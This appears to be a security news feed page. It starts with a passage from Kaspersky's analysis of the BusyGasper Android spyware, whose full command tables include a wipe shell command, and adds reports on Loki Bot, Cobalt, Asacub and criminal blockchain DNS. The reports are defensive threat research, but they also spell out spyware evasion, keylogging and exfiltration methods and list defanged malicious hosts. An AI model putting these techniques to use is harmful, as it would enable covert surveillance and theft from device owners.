2560942bb50ee6e6f55afc495d238a12 2 v3.18s
It’s interesting that the issuer “Sun” matches the “Sun1” and “Sun2” identifiers of infected devices from the FTP server, suggesting they may be test devices.

The analyzed implant has a complex structure, and for now we have observed two modules.

First (start) module
The first module, which was installed on the targeted device, could be controlled over the IRC protocol and enable deployment of other components by downloading a payload from the FTP server:

@install command

As can be seen from the screenshot above, a new component was copied in the system path, though that sort of operation is impossible without root privileges. At the time of writing we had no evidence of an exploit being used to obtain root privileges, though it is possible that the attackers used some unseen component to implement this feature.

Here is a full list of possible commands that can be executed by the first module:

Command name Description
@stop Stop IRC
@quit System.exit(0)
@start Start IRC
@server Set IRC server (default value is “”), port is always 6667
@boss Set IRC command and control nickname (default value is “ISeency”)
@nick Set IRC client nickname
@screen Report every time when screen is on (enable/disable)
@root Use root features (enable/disable)
@timer Set period of IRCService start
@hide Hide implant icon
@unhide Unhide implant icon
@run Execute specified shell
@broadcast Send command to the second module
@echo Write specified message to log
@install Download and copy specified component to the system path
The implant uses a complex intent-based communication mechanism between its components to broadcast commands:

Approximate graph of relationships between BusyGasper components

Second (main) module
This module writes a log of the command execution history to the file named “lock”, which is later exfiltrated. Below is a fragment of such a log:

Log with specified command

Log files can be uploaded to the FTP server and sent to the attacker’s email inbox. It’s even possible to send log messages via SMS to the attacker’s number.

As the screenshot above shows, the malware has its own command syntax that represents a combination of characters while the “#” symbol is a delimiter. A full list of all possible commands with descriptions can be found in Appendix II below.

The malware has all the popular capabilities of modern spyware. Below is a description of the most noteworthy:

The implant is able to spy on all available device sensors and to log registered events. Moreover, there is a special handler for the accelerometer that is able to calculate and log the device’s speed:

This feature is used in particular by the command “tk0” that mutes the device, disables keyguard, turns off the brightness, uses wakelock and listens to device sensors. This allows it to silently execute any backdoor activity without the user knowing that the device is in an active state. As soon as the user picks up the device, the implant will detect a motion event and execute the “tk1” and “input keyevent 3” commands.

“tk1” will disable all the effects of the “tk0” command, while “input keyevent 3” is the shell command that simulates the pressing of the ‘home’ button so all the current activities will be minimized and the user won’t suspect anything.

Location services to enable (GPS/network) tracking:

The email command and control protocol. The implant can log in to the attackers email inbox, parse emails for commands in a special “Cmd” folder and save any payloads to a device from email attachments.

Accessing the “Cmd” folder in the attacker’s email box

Moreover, it can send a specified file or all the gathered data from the victim device via email.

Emergency SMS commands. If an incoming SMS contains one of the following magic strings: ” 2736428734″ or ” 7238742800″ the malware will execute multiple initial commands:

Keylogger implementation
Keylogging is implemented in an original manner.

Immediately after activation, the malware creates a textView element in a new window with the following layout parameters:

All these parameters ensure the element is hidden from the user.

Then it adds onTouchListener to this textView and is able to process every user tap.

Interestingly, there is a whitelist of tapped activities:

The listener can operate with only coordinates, so it calculates pressed characters by matching given values with hardcoded ones:

Additionally, if there is a predefined command, the keylogger can make a screenshot of the tapped display area:

Manual access and operator menu
There is a hidden menu (Activity) for controlling implant features that looks like it was created for manual operator control. To activate this menu the operator needs to call the hardcoded number “9909” from the infected device:

A hidden menu then instantly appears on the device display:

The operator can use this interface to type any command for execution. It also shows a current malware log.

FTP server
The attackers used ftp://213.174.157[.]151/ as a command and control server. The IP belongs to the free Russian web hosting service Ucoz.

Files Description
CMDS*.txt Text files with commands to execute
supersu.apk SuperSU(eu.chainfire.supersu) tool
us.x SuperSU ELF binaries
supersu.cfg.old SuperSU configs with spyware implant mention
bb.txt BusyBox v1.26.2 ELF file
bdata.xml Config file for excluding malware components from Android battery saver feature Doze
bdatas.apk Main implant module Start implant module
MobileManagerService.apk ASUS firmware system component (clean)
mobilemanager.apk Corrupted archive
privapp.txt Looks like a list of system applications (including spyware components) from the infected device
run-as.y Run-as tool ELF file
SuperSU config fragment for implant components and the busybox tool supersu.cfg:

This config allows the implant to use all root features silently.

Content of bdata.xml file:

It can be added to the /system/etc/sysconfig/ path to whitelist specified implant components from the battery saving system.

Email account
A Gmail account with password is mentioned in the sample’s code:

It contains the victim’s exfiltrated data and “cmd” directory with commands for victim devices.

Appendix I: Indicators of compromise


Appendix II: List of all possible commands
These values are valid for the most recently observed version (v3.18s).

Decimal Char Description
33 ! Interrupt previous command execution
36 $ Make a screenshot
48 0 Execute following shell: rm c/*; rm p/*; rm sdcard/Android/system/tmp/r/* (wipe environment paths?)
63 ? Log device info and implant meta information
66(98) B(b) Broadcast specified command to another component
67(99) C(c) Set specified command on timer to execute
68(100) 65(97) D(d) A(a) Log last 10 tasks by getRecentTasks api
68(100) 83(115) D(d) S(s) Log info about device sensors (motion, air temperature and pressure, etc.)
68(100) 84(116) D(d) T(t) Log stack trace and thread information
GPS module
101 e Broadcast command to GPS-tracking external component
71(103) G(g) Location tracking GPS/network
Interaction with operators
73(105) 102 114 I(i) f r Get specified file from FTP (default – CMDS file with commands)
73(105) 102 115 I(i) f s Upload exfiltrated data
73(105) 73(105) I(i) I(i) Start/stop IRC service
73(105) 76(108) I(i) L(l) Send current location to IRC
73(105) 77(109) I(i) M(m) Push specified message to IRC
73(105) 82(114) I(i) R(r) Read commands from the email inbox
73(105) 83(115) I(i) S(s) Send specified file or all gathered data in email with UID as a subject
Network geolocation
76(108) L(l) Get info on current cell_id
Camera features
77(109) 99 M(m) c Capture photo
77(109) 108 M(m) l Log information about available cameras
77(109) 114 97 M(m) r a Start/stop audio recording (default duration – 2 minutes)
77(109) 114 98 M(m) r b Start/stop audio recording with specified duration
77(109) 114 44(114) M(m) r ,(r) Start fully customizable recording (allow to choose specific mic etc.)
77(109) 114 115 M(m) r s Stop previous recording
77(109) 114 116 M(m) r t Set recording duration
77(109) 118 M(m) v Capture video with specified duration and quality
79(111) 102 O(o) f Hard stop of implant services, unregister receivers
79(111) 110 O(o) n Start main implant service with all components
80(112) P(p) Find specified images and scale them with “inSampleSize” API
81(113) Q(q) Stop main implant service
82(114) R(r) Execute specified shell command
Shared preferences setup
83(115) 33 S(s) ! On/off hidden operator activity
83(115) 61 S(s) = Shared preferences control (set/remove specified value)
83(115) 98 S(s) b On/off sending SMS message after device boot
83(115) 99 S(s) c Put boolean value in shared preference “cpyl”
83(115) 100 S(s) d Put boolean value in shared preference “dconn”
83(115) 101 S(s) e On/off periodically reenabling data connectivity
83(115) 102 S(s) f Set GPS location update period
83(115) 105 S(s) i Put boolean value in shared preference “imsg”
83(115) 108 97 S(s) l a On/off foreground process activity logging
83(115) 108 99 S(s) l c Start watching on captured photos and videos
83(115) 108 102 S(s) l f Start watching on Facebook messenger database changes
83(115) 108 108 S(s) l l On/off browser history logging
83(115) 108 116 S(s) l t Start watching on Telegram messenger cache database changes
83(115) 108 118 S(s) l v Start watching on Viber messenger database changes
83(115) 108 119 S(s) l w Start watching on WhatsApp messenger database changes
83(115) 109 S(s) m On/off sending log SMS messages
83(115) 110(112) S(s) o(p) Set operator telephone number (for SMS logging)
83(115) 113 S(s) q Set implant stop-mode (full or only main service)
83(115) 114 S(s) r On/off execution shell as root
83(115) 115 S(s) s On/off screen state logging
83(115) 116 S(s) t On/off screen touches logging and number of related screenshots
83(115) 117 S(s) u On/off debug logging mode with system thread info
83(115) 120 S(s) x Use FTP connection via busybox or default Socket API
Sensor and display control
84(116) 98 T(t) b On/off screen brightness
84(116) 100 T(t) d On/off network data (internet)
84(116) 75(107) 48 T(t) K(k) 0 Mute, turn off brightness, disable keyguard, use wakelock and listen on device sensors.
84(116) 75(107) 49 T(t) K(k) 1 Disable features from previous command
84(116) 75(107) 50 T(t) K(k) 2 Disable Keyguard instance
84(116) 75(107) 51 T(t) K(k) 3 Write “userActivity” to log
84(116) 115 48 T(t) s 0 Disable sensor listener
84(116) 115 49 T(t) s 1 Register listener for specified sensor
84(116) 115 108 T(t) s l Log int value from file /dev/lightsensor
84(116) 119 48 T(t) w 0 Turn WiFi off
84(116) 119 49 T(t) w 1 Turn WiFi on
84(116) 119 108 T(t) w l Control WiFi lock
Common backdoor commands
85(117) U(u) Download payload, remount “system” path and push payload there. Based on the code commentaries, this feature might be used to update implant components
87(119) W(w) Send SMS with specified text and number
Updates from the newest version
122 33 z ! Reboot device
122 99 z c Dump call logs
122 102 z f p Send gathered data to FTP
122 102 z f g Get CMDS* text file and execute contained commands
122 103 z g Get GPS location (without log, only intent broadcasting)
122 108 102 z l f Dump Facebook messages during specified period
122 108 116 z l t Dump Telegram cache
122 108 118 z l v Dump Viber messages during specified period
122 108 119 z l w Dump WhatsApp messages during specified period
122 110 z n Get number of all SMS messages
122 111 z o Set ringer mode to silent
122 112 z p Open specified URL in webview
122 114 z r Delete all raw SMS messages
122 116 z t Set all internal service timers
122 122 z z Remove shared preferences and restart the main service
126 ~ On/off advanced logging mode with SMS and UI activity

Loki Bot: On a hunt for corporate passwords

31.8.2018 Kaspersky  BotNet

Starting from early July, we have seen malicious spam activity that has targeted corporate mailboxes. The messages discovered so far contain an attachment with an .iso extension that Kaspersky Lab solutions detect as Loki Bot. The malware’s key objective is to steal passwords from browsers, messaging applications, mail and FTP clients, and cryptocurrency wallets. Loki Bot dispatches all its loot to the malware owners.

ISO images are copies of optical discs that can be mounted in a virtual CD/DVD drive to be used in the same way as the originals. Whereas in days of yore users needed dedicated software to open this type of image, today’s operating systems support the format out of the box, and if you want to access the contents of the file, all you need to do is double-click. Malicious spam uses this type of file as a container for delivering malware, albeit rarely.

As mentioned above, hackers were sending out copies of Loki Bot to company email addresses that could be obtained from public sources or from the companies’ own websites.

The emailed messages were notably diverse:

Fake notifications from well-known companies

Imitating messages from well-known corporations is one of the most popular tricks in the hackers’ arsenal. Interestingly enough, fake emails used to be directed mostly at common users and customers, whereas now companies are increasingly the target.

Fake notifications containing financial documents

The scammers passed off malicious files as financial documents: invoices, transfers, payments, etc. This is a fairly popular malicious spamming technique, with the message body usually no more than a few lines and the subject mentioning what exactly is purported to be attached.

Fake orders or offers

Phishers may pose as customers placing an order, or a vendor offering their goods or services.

Every year we observe an increase in spam attacks on the corporate sector. The perpetrators have used phishing and malicious spam, including forged business emails, in their pursuit of confidential corporate information: intellectual property, authentication data, databases, bank accounts, etc. That’s why today it’s essential for corporate security measures to include both technical protection and training for employees, because their actions may cause irreparable damage to the business.

New Cobalt Campaign Targets Russian and Romanian Banks
31.8.2018 securityweek CyberCrime

A new campaign by the Russia-based Cobalt hacking group was observed on August 13, 2018. Cobalt is best-known for targeting financial institutions, and this campaign is no different. Two targets have been identified to date: NS Bank in Russia and Carpatica/Patria in Romania.

Cobalt has been operating since at least 2016. So far it is credited with the theft of $9.7 million from the Russian MetakkinvestBank; ATM thefts of $2.18 million from Taiwan banks; a SWIFT attack on Russian banks; and more than 200 other attacks on banks in Europe, Thailand, Turkey and Taiwan. Last year it was reported that Cobalt had expanded its range into also targeting government, telecom/Internet, service providers, manufacturing, entertainment, and healthcare organizations, often using government organizations and ministries as a stepping stone for other targets.

A common theme for Cobalt is to start with spear-phishing emails to gain the initial entry. In financial attacks, the emails usually masquerade as other financial institutions or a financial supplier/partner domain to gain the target's trust.

In an analysis of the new campaign, Netscout's ASERT researchers show numerous parallels with known Cobalt TTPs and tools -- but with one new divergence. One of the phishing emails it has discovered contains two separate malicious URLs. The first is a weaponized Word document, while the second is a binary with a .jpg extension.

The researchers had uncovered two malware samples that connect the new campaign to Cobalt. The first was a JavaScript backdoor that shares functionality with other backdoors. The second is COOLPANTS, a reconnaissance backdoor linked to Cobalt and originally found by researcher Szabolcs Schmidt. The new report notes that COOLPANTS appears to be an evolution of Coblnt -- 28 of its 57 functions match under comparison tool Diaphora. Furthermore, COOLPANTS connects to hxxps://apstore[.]info, which Proofpoint describes as a Cobalt C2.

On 13 August 2018, ASERT found a new sample almost identical to COOLPANTS. It was compiled at the same time on 1 August 2018. Its 48 functions match those in COOLPANTS under the 'Best Match' tab in Diaphora. This sample, however, has rietumu[.]me as its C2. Inspecting rietumu[.]me, ASERT found the email address, solisariana[@]protonmail[.]com. Pivoting from this address, it found five more new domains all created on 1 August 2018.

The domains are compass[.]plus; eucentalbank[.]com; europecentalbank[.]com; inter-kassa[.]com; and unibank[.]credit. Each one is clearly designed to masquerade as the domain of a financial services organization. The real Interkassa, for example -- and according to its genuine website -- is a payments processing firm based in Ukraine.

The researchers used the inter-kassa domain and searched for samples. They found a spear-phishing email that bears all the hallmarks of a Cobalt campaign, dated 2 August 2018. It is addressed to bulavina AT ns-bank DOT ru and sent by "Interkassa" <denis AT inter-kassa DOT com>. Interestingly, LinkedIn lists a Denys Kyrychenko as co-owner and CTO of Interkassa.

It is this email that provides two embedded malicious links. One calls a weaponized Word document with an embedded VBA script. If macros are allowed, the script generates a cmd.exe command that launches cmstp.exe with an INF file. The INF file beacons back to the C2 to download a payload that is executed by cmstp.exe.

The eventual JavaScript backdoor -- named 'more_eggs' -- is almost identical to the backdoor analyzed by Trend Micro this time last year and attributed to Cobalt. Both provide five commands that essentially allow attackers to take over an infected system.

These commands are d&exec (downloads and executes a PE file); more_eggs (downloads an update for itself); gtfo (deletes itself and related registry entries); more_onion (executes the 'new' copy of itself); and vai_x (executes a command via cmd). Only the last command differs between the two versions, with the earlier one having the name more_power for vai_x.

The second URL in the spear-phishing email, with a dot-jpg filename, downloads an executable rather than an image file. This also ultimately beacons to its C2 server, which was not -- at the time of analysis -- responding.

ASERT is confident that this, and another campaign discovered by Intel471 targeting Romanian carpatica[.]ro by masquerading as Single Euro Payments Area (SEPA), are both the work of the Cobalt group. Only the use of two separate infection points in one email with two separate C2s makes this campaign unusual. "One could speculate that this would increase the infection odds," comments the report -- for example, if Word macros are successfully disallowed by the target, he or she might still succumb to the disguised jpg.

"ASERT believes," says the report, "Cobalt Group will continue targeting financial organizations in Eastern Europe and Russia based on the observables in this campaign and their normal modus operandi." It is worth mentioning that Trend Micro has suggested that COBALT starts by targeting Russia and the old USSR states to test out its methodology before moving on to European and other targets.

ASERT is the threat intelligence team of Arbor Networks, which is the security division of NETSCOUT.

What Happens to Whistleblowers After They Blow the Whistle?
31.8.2018 securityaffairs  IT

Whistleblowers are a controversial subgroup of the modern workforce. What Happens to Whistle Site after they reveal uncomfortable truths?
Whistleblowers are a controversial subgroup of the modern workforce. Although their intentions are often pure and they frequently uncover wrongdoings or shortcomings in their particular niche, there are usually some consequences too.

Complicating matters even further is the relative ease of reporting suspected misdeeds in the 21st century. Uncovering wrongdoings in the past often stemmed from hands-on experience with a company — and it usually took years to build a case.

With the popularity of the internet, whistleblowers are now emerging in the most unlikely of places. Now it only takes seconds to spread the word about a company’s misdeeds — whether they’re true or not.

Immediate Consequences

Although whistleblowers are guarded in the United States by the Whistleblower Protection Act of 1989, the amount of protection is minimal — and it doesn’t provide any coverage for the potential fallout of blowing the whistle.

Per a 1990 survey by McMillan, 90 percent of U.S.-based whistleblowers lost their jobs or received demotions, and 27 percent faced legal issues — including defamation. On the darker side, 10 percent eventually attempted suicide as a result of their actions. Another survey, conducted by Whistleblowers Australia (WBA) in 1993, revealed similar numbers.

According to the WBA’s survey, companies often use informal or subversive tactics to punish a whistleblower who remains a part of their organization after the fact. Common strategies include isolation from workplace or industry peers, removal of normal work duties and responsibilities and other disciplinary actions.

Most states have also enacted laws and anti-retaliation clauses for whistleblowers, but these protections only go so far. They also require the whistleblower to prove that the retaliation is a direct result of their whistleblowing, and that’s not always an easy task.

The amount of potential retaliation also depends on the whistleblower’s status as a public or private sector employee. It’s much safer to report wrongdoings and misdeeds in the public sector, as these issues often affect public health or safety and are almost always covered by local laws. Those in the private sector don’t always have such protection.


Long-Term Effects

Smaller, localized incidents tend to disappear after some time. While there are some famous cases and prominent names that are forever cast as whistleblowers — like Erin Brockovich and Edward Snowden — those cases are the exception.

Most whistleblowers have to leave their current job — especially if the issue involves their employer. Others accept a demotion or reassignment within the same organization, but these new positions typically don’t last very long.

Some whistleblowers go bankrupt during the process. It takes a lot of time to build a case and shed light on a company’s misdoings. Presenting the issue in a court of law adds weeks — and sometimes months or years — to the otherwise straightforward task of whistleblowing. Making matters worse is the fact that most court cases are not settled in the complainant’s favor.

Others have to relocate to another state or, in the most extreme cases, another country entirely. Edward Snowden, a U.S.-born citizen and former member of the CIA, currently lives under asylum in the Russian city of Moscow. Their government recently decided to extend his right to asylum until 2020 at the earliest.

Living Productively After Blowing the Whistle

The act of whistleblowing sometimes has unintended consequences that reach beyond the individual complainant, the offending company and the local community.

While it often addresses the misdeeds of corporations and governments around the world, the individuals who shed light on these shady acts are often targeted — legally or illegally — by those who don’t agree with their tactics for one reason or another.

Whether they’re seen as martyrs or miscreants, their lives are usually changed after the fact.

BusyGasper spyware remained undetected for two years while spying Russians
31.8.2018 securityaffairs  Android  CyberSpy

Security experts from Kaspersky Lab have uncovered a new strain of Android malware dubbed BusyGasper that remained hidden for two years.
The BusyGasper Android spyware has been active since May 2016, it implements unusual features for this type of malware. Experts explained it is a unique spy implant with stand-out features such as device sensors listeners. BusyGasper can spy on all device sensors and enable GPS/network tracking, and it can run multiple initial commands if an incoming SMS contains a specific string.

The malware has an incredibly wide-ranging protocol, it is able to support about 100 commands and to bypass the Doze battery saver.

BusyGasper can exfiltrate data from several messaging applications, including WhatsApp, Viber, Facebook, and implements keylogging capabilities.

“Further investigation showed that the malware, which we named BusyGasper, is not all that sophisticated, but demonstrates some unusual features for this type of threat.” reads the report published by Kaspersky.

“The sample has a multicomponent structure and can download a payload or updates from its C&C server, which happens to be an FTP server belonging to the free Russian web hosting service Ucoz.”


According to the researchers, the malware is installed manually through physical access to the target devices, Kaspersky has identified less than 10 victims to date, all of them located in Russia.

The Android malware also supports the IRC protocol that is very uncommon for Android malware.

The malicious code can log in to the attacker’s email inbox, parse emails in a special folder for commands and save any payloads to a device from email attachments.

The analysis of the malware revealed the attackers used the malware to gather victims’ personal data, including messages from IM applications and SMS banking messages.

“We found no similarities to commercial spyware products or to other known spyware variants, which suggests BusyGasper is self-developed and used by a single threat actor.” continues Kaspersky.

“At the same time, the lack of encryption, use of a public FTP server and the low opsec level could indicate that less skilled attackers are behind the malware”

The first module installed on the targeted device can be controlled over the IRC protocol and allows attackers to deploy additional components. The module seems to have root privileges, but malware researchers did not find evidence of the user of an exploit.

The module supports a wide range of commands including start/stop IRC, manage IRC settings, exit, use root features, report when the screen is on, hide/unhide the implant icon, execute shell, send commands to the second module, download and copy component to the system path, and write specified message to log.

The second module writes a log of the command execution history to a file named “lock,” which is later uploaded on the C&C server. Log messages can also be sent via SMS to the attacker’s number.

“Log files can be uploaded to the FTP server and sent to the attacker’s email inbox. It’s even possible to send log messages via SMS to the attacker’s number.” continues Kaspersky.

“As the screenshot above shows, the malware has its own command syntax that represents a combination of characters while the “#” symbol is a delimiter. A full list of all possible commands with descriptions can be found in Appendix II below.”

Experts discovered a hidden menu that could be used for manual operator control, it can be activated if the operator calls the hardcoded number “9909” from the infected device.

Kaspersky included in the report the IoCs.

The rise of mobile banker Asacub
30.8.2018 Kaspersky Android

We encountered the Trojan-Banker.AndroidOS.Asacub family for the first time in 2015, when the first versions of the malware were detected, analyzed, and found to be more adept at spying than stealing funds. The Trojan has evolved since then, aided by a large-scale distribution campaign by its creators (in spring-summer 2017), helping Asacub to claim top spots in last year’s ranking by number of attacks among mobile banking Trojans, outperforming other families such as Svpeng and Faketoken.

We decided to take a peek under the hood of a modern member of the Asacub family. Our eyes fell on the latest version of the Trojan, which is designed to steal money from owners of Android devices connected to the mobile banking service of one of Russia’s largest banks.

Asacub versions
Sewn into the body of the Trojan is the version number, consisting of two or three digits separated by periods. The numbering seems to have started anew after the version 9.

The name Asacub appeared with version 4 in late 2015; previous versions were known as Trojan-SMS.AndroidOS.Smaps. Versions 5.X.X-8.X.X were active in 2016, and versions 9.X.X-1.X.X in 2017. In 2018, the most actively distributed versions were 5.0.0 and 5.0.3.

Communication with C&C
Although Asacub’s capabilities gradually evolved, its network behavior and method of communication with the command-and-control (C&C) server changed little. This strongly suggested that the banking Trojans, despite differing in terms of capability, belong to the same family.

Data was always sent to the C&C server via HTTP in the body of a POST request in encrypted form to the relative address /something/index.php. In earlier versions, the something part of the relative path was a partially intelligible, yet random mix of words and short combinations of letters and numbers separated by an underscore, for example, “bee_bomb” or “my_te2_mms”.

Example of traffic from an early version of Asacub (2015)

The data transmitted and received is encrypted with the RC4 algorithm and encoded using the base64 standard. The C&C address and the encryption key (one for different modifications in versions 4.x and 5.x, and distinct for different C&Cs in later versions) are stitched into the body of the Trojan. In early versions of Asacub, .com, .biz, .info, .in, .pw were used as top-level domains. In the 2016 version, the value of the User-Agent header changed, as did the method of generating the relative path in the URL: now the part before /index.php is a mix of a pronounceable (if not entirely meaningful) word and random letters and numbers, for example, “muromec280j9tqeyjy5sm1qy71” or “parabbelumf8jgybdd6w0qa0”. Moreover, incoming traffic from the C&C server began to use gzip compression, and the top-level domain for all C&Cs was .com:

Since December 2016, the changes in C&C communication methods have affected only how the relative path in the URL is generated: the pronounceable word was replaced by a rather long random combination of letters and numbers, for example, “ozvi4malen7dwdh” or “f29u8oi77024clufhw1u5ws62”. At the time of writing this article, no other significant changes in Asacub’s network behavior had been observed:

The origin of Asacub
It is fairly safe to say that the Asacub family evolved from Trojan-SMS.AndroidOS.Smaps. Communication between both Trojans and their C&C servers is based on the same principle, the relative addresses to which Trojans send network requests are generated in a similar manner, and the set of possible commands that the two Trojans can perform also overlaps. What’s more, the numbering of Asacub versions is a continuation of the Smaps system. The main difference is that Smaps transmits data as plain text, while Asacub encrypts data with the RC4 algorithm and then encodes it into base64 format.

Let’s compare examples of traffic from Smaps and Asacub — an initializing request to the C&C server with information about the infected device and a response from the server with a command for execution:

Smaps request

Asacub request

Decrypted data from Asacub traffic:

{“id”:”532bf15a-b784-47e5-92fa-72198a2929f5″,”type”:”get”,”info”:”imei:365548770159066, country:PL, cell:Tele2, android:4.2.2, model:GT-N5100, phonenumber:+486679225120, sim:6337076348906359089f, app:null, ver:5.0.2″}

Data sent to the server

[{“command”:”sent&&&”,”params”:{“to”:”+79262000900″,”body”:”\u0410\u0412\u0422\u041e\u041f\u041b\u0410\u0422\u0415\u0416 1000 50″,”timestamp”:”1452272572″}},
Instructions received from the server

A comparison can also be made of the format in which Asacub and Smaps forward incoming SMS (encoded with the base64 algorithm) from the device to the C&C server:

Smaps format

Asacub format

Decrypted data from Asacub traffic:


The banking Trojan is propagated via phishing SMS containing a link and an offer to view a photo or MMS. The link points to a web page with a similar sentence and a button for downloading the APK file of the Trojan to the device.

The Trojan download window

Asacub masquerades under the guise of an MMS app or a client of a popular free ads service. We came across the names Photo, Message, Avito Offer, and MMS Message.

App icons under which Asacub masks itself

The APK files of the Trojan are downloaded from sites such as mmsprivate[.]site, photolike[.]fun, you-foto[.]site, and mms4you[.]me under names in the format:

For the Trojan to install, the user must allow installation of apps from unknown sources in the device settings.

During installation, depending on the version of the Trojan, Asacub prompts the user either for Device Administrator rights or for permission to use AccessibilityService. After receiving the rights, it sets itself as the default SMS app and disappears from the device screen. If the user ignores or rejects the request, the window reopens every few seconds.

The Trojan requests Device Administrator rights

The Trojan requests permission to use AccessibilityService

After installation, the Trojan starts communicating with the cybercriminals’ C&C server. All data is transmitted in JSON format (after decryption). It includes information about the smartphone model, the OS version, the mobile operator, and the Trojan version.

Let’s take an in-depth look at Asacub 5.0.3, the most widespread version in 2018.

Structure of data sent to the server:

Structure of data received from the server:

To begin with, the Trojan sends information about the device to the server:

“country”:int, //optional
“imei”:int //optional
“country”:int, //optional
“imei”:int //optional
In response, the server sends the code of the command for execution (“command”), its parameters (“params”), and the time delay before execution (“waitrun” in milliseconds).

List of commands sewn into the body of the Trojan:

Command code Parameters Actions
2 – Sending a list of contacts from the address book of the infected device to the C&C server
7 “to”:int Calling the specified number
11 “to”:int, “body”:string Sending an SMS with the specified text to the specified number
19 “text”:string, “n”:string Sending SMS with the specified text to numbers from the address book of the infected device, with the name of the addressee from the address book substituted into the message text
40 “text”:string Shutting down applications with specific names (antivirus and banking applications)
The set of possible commands is the most significant difference between the various flavors of Asacub. In the 2015-early 2016 versions examined in this article, C&C instructions in JSON format contained the name of the command in text form (“get_sms”, “block_phone”). In later versions, instead of the name of the command, its numerical code was transmitted. The same numerical code corresponded to one command in different versions, but the set of supported commands varied. For example, version 9.0.7 (2017) featured the following set of commands: 2, 4, 8, 11, 12, 15, 16, 17, 18, 19, 20.

After receiving the command, the Trojan attempts to execute it, before informing C&C of the execution status and any data received. The “id” value inside the “data” block is equal to the “timestamp” value of the relevant command:

In addition, the Trojan sets itself as the default SMS application and, on receiving a new SMS, forwards the sender’s number and the message text in base64 format to the cybercriminal:

Thus, Asacub can withdraw funds from a bank card linked to the phone by sending SMS for the transfer of funds to another account using the number of the card or mobile phone. Moreover, the Trojan intercepts SMS from the bank that contain one-time passwords and information about the balance of the linked bank card. Some versions of the Trojan can autonomously retrieve confirmation codes from such SMS and send them to the required number. What’s more, the user cannot check the balance via mobile banking or change any settings there, because after receiving the command with code 40, the Trojan prevents the banking app from running on the phone.

User messages created by the Trojan during installation typically contain grammatical and spelling errors, and use a mixture of Cyrillic and Latin characters.

The Trojan also employs various obfuscation methods: from the simplest, such as string concatenation and renaming of classes and methods, to implementing functions in native code and embedding SO libraries in C/C++ in the APK file, which requires the use of additional tools or dynamic analysis for deobfuscation, since most tools for static analysis of Android apps support only Dalvik bytecode. In some versions of Asacub, strings in the app are encrypted using the same algorithm as data sent to C&C, but with different keys.

Example of using native code for obfuscation

Examples of using string concatenation for obfuscation

Example of encrypting strings in the Trojan

Asacub distribution geography
Asacub is primarily aimed at Russian users: 98% of infections (225,000) occur in Russia, since the cybercriminals specifically target clients of a major Russian bank. The Trojan also hit users from Ukraine, Turkey, Germany, Belarus, Poland, Armenia, Kazakhstan, the US, and other countries.

The case of Asacub shows that mobile malware can function for several years with minimal changes to the distribution scheme.

It is basically SMS spam: many people still follow suspicious links, install software from third-party sources, and give permissions to apps without a second thought. At the same time, cybercriminals are reluctant to change the method of communication with the C&C server, since this would require more effort and reap less benefit than modifying the executable file. The most significant change in this particular Trojan’s history was the encryption of data sent between the device and C&C. That said, so as to hinder detection of new versions, the Trojan’s APK file and the C&C server domains are changed regularly, and the Trojan download links are often one-time-use.

C&C IP addresses:
IP addresses from which the Trojan was downloaded:

How Cybercriminals Are Using Blockchain to Their Advantage
30.8.2018 securityweek CyberCrime

Cybercriminals Have Been Experimenting With a Blockchain Domain Name System (DNS)

The takedowns of AlphaBay and Hansa in 2017 by law enforcement gave rise to much speculation about the future of dark web marketplaces. As I’ve discussed before, an environment of fear and mistrust are driving the cybercriminal community to incorporate alternative technologies to improve security and remain below the radar as they conduct illicit business online. One such technology is blockchain.

When most people hear the term “blockchain” they typically think of cryptocurrencies and other applications where transactions and interactions among a community of users must be executed with a high degree of trust, efficiency and transparency. However, if we consider the recent challenges that administrators of online criminal forums have encountered, it only makes sense that they would explore applications for blockchain. To that end, some have been experimenting with a blockchain domain name system (DNS) as a way of hiding their malicious activity and bullet-proofing their offerings.

A blockchain DNS is different from a traditional DNS. Typically, when we type a website into an Internet browser, a computer will query a DNS server for an IP address. Essentially, this is the Internet equivalent of a phone book. It includes the name of the entity and then, after the “dot”, the extension known as the Top Level Domain (TLD), which could be .com, .gov., .edu, .uk, .de, etc. The TLD is controlled by a central authority such as Internet Corporation for Assigned Names and Numbers (ICANN) with a global reach, or regional authorities like Nominet in the U.K. or DENIC in Germany. In contrast, Blockchain DNS is a decentralized DNS. Blockchain TLDs – including .bit, .bazar and .coin – are not owned by a single central authority. DNS lookup tables are shared over a peer-to-peer network and use a different technology from traditional DNS requests.

Decentralized DNS offers many benefits such as countering censorship by authorities (for example if a government orders all Internet Service Providers in a country to stop redirecting domains to a relevant IP address), or preventing DNS spoofing, where attackers can insert corrupt DNS data so that the name server returns an incorrect IP address and redirects traffic to an attacker computer. However, decentralized DNS can also be abused by attackers for malicious purposes. As blockchain domains do not have a central authority and registrations contain unique encrypted hashes rather than an individual’s name and address, it is harder for law enforcement to perform site takedowns. The following are just a few examples of bad actors using blockchain.

Back in January 2016, one of the first groups to employ blockchain DNS to create a .bazar domain in an attempt to better secure their operations was a group known as The Money Team. In July 2017, the Joker’s Stash, a popular Automated Vending Cart (AVC) site used to purchase stolen payment card details, began using blockchain DNS alongside its established Tor (.onion) domain. Users wanting to access the .bazar version of the site need to install a blockchain DNS browser extension or add-on. Other AVC sites and forums used to trade stolen account information have also been experimenting with peer-to-peer DNS technology.

Blockchain technology has also allowed users to realize alternative models for online marketplaces. The site known as Tralfamadore, for example, uses blockchain as its back-end to store the necessary databases and code to support front-end user interfaces. Transactions are made using cryptocurrency and recorded as smart contracts on the blockchain. The aim is to improve trust among users of the site as all transactions are permanently recorded and scam vendors can be more easily identified.

Another marketplace using blockchain technology is the site OpenBazaar. This project began in April 2016 and its userbase has increased steadily since then. In the first half of 2018, the number of new users on the site has risen by roughly 4,000, while the items for sale have gone up from 18,000 to over 27,000. Despite these gains, OpenBazaar has not been used for cybercriminal activity to any great extent, and the majority of items listed on the site would not be classed as illicit.

Despite these examples, it’s important to remember that as with most things in life, there are tradeoffs. The use of blockchain for cybercriminal activity is no exception. The primary issue preventing its wider adoption is that with blockchain-based platforms all interactions are publicly recorded. This goes against the strong desire by many users to engage in private messaging. Many cybercriminals are choosing to conduct their business away from dark web marketplaces and underground forums altogether. Instead, they are using their site to advertise their service and then directing users to dedicated channels on Jabber, Internet Relay Chat (IRC), Skype, Discord and Telegram to conduct their business. Buyers can contact sellers directly through peer-to-peer networks and private chat channels and execute transactions using cryptocurrencies or electronic payment services.

As cybersecurity professionals, we should continue to monitor for an uptick in the adoption of blockchain for the buying and selling of illicit goods. And while we’re at it, we should also continue to assess other emerging technologies that could be used for nefarious purposes. Because as long as there is a market for what cybercriminals have for sale – everything from compromised accounts and stolen payment cards to counterfeit goods – you can be sure they’ll find new and creative ways to profit.

Instagram Introduces New Account Safety Features
